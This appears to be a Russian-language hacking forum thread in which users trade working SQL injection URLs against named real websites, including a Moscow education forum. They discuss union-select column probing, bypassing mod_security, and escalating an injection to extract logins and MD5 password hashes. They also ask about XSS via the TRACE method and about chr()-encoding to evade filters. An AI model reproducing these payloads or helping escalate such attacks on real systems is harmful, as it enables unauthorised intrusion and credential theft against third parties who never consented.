Почему-то отрезать лишнее комментарии не получается, но можно и по другому модифицировать запрос. http://www.e3e5.com/articles.php?section=-12))+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+sections_captions+where+((1=1 подобрать нужную таблицу не удалось. Решил поискать более подходящий инъект. Нашел этот http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+author+where+((1=1 2 скл запроса =/ Вывод сделать врядли получится. Но можно воспользоваться аналогом "more that 1 row". http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+author+where+((1=(select+1,2)+ Но это ты уж сам. Удачи
pangolin: http://raz0r.name/obzory/pangolin-sql-inekcii-teper-ne-utomlyayut/ http://nosec.org/en/pangolin_download.html и дампилка на перле: http://forum.antichat.ru/showpost.php?p=236188&postcount=3
http://www.strongcube.com/download.php?product=-2+union/**/select+concat_ws(0x3a,user(),database(),version()),2,3 Просто какой-то мод (mod_security) если видит union+select в запросе, тогда Forbidden
уважаемые, подскажите, какую именно XSS атаку можно провести на ресурс, если на нем доступен метод TRACE ( Может быть, на конкретных примерах)
Ты все же решил проигнорировать наш совет насчет сканеров уязвимостей да ? Вот спросил бы у разработчика хспайдера какую там атаку он хотел провести и много ли раз у него это получалось :/ http://www.inattack.ru/article/516.html пункт 3 XSS-нападения методом TRACE.
вот от нечего делать нашел скулю на сайте московского образования: http://forum.mioo.ru/ege2010/rt1.php?firstrow=20' Но дальше раскрутить никак не могу, даже подобрать столбцы не удается. Если кому то интересно, поvогите, расскажите как раскрутить дальше до вида login ; md5 PASS
jecka3000 не смотрел но если oRb прав то вот : http://www.securitylab.ru/contest/212083.php - есть пункт про иньекцию в лимите http://forum.antichat.ru/showthread.php?t=56446 - просто тема про иньекцию в лимите
есть ли генератор на php в который ввел значение типа "pg_users" А она тебе примерно это chr(111)||chr(110)||chr(97) ?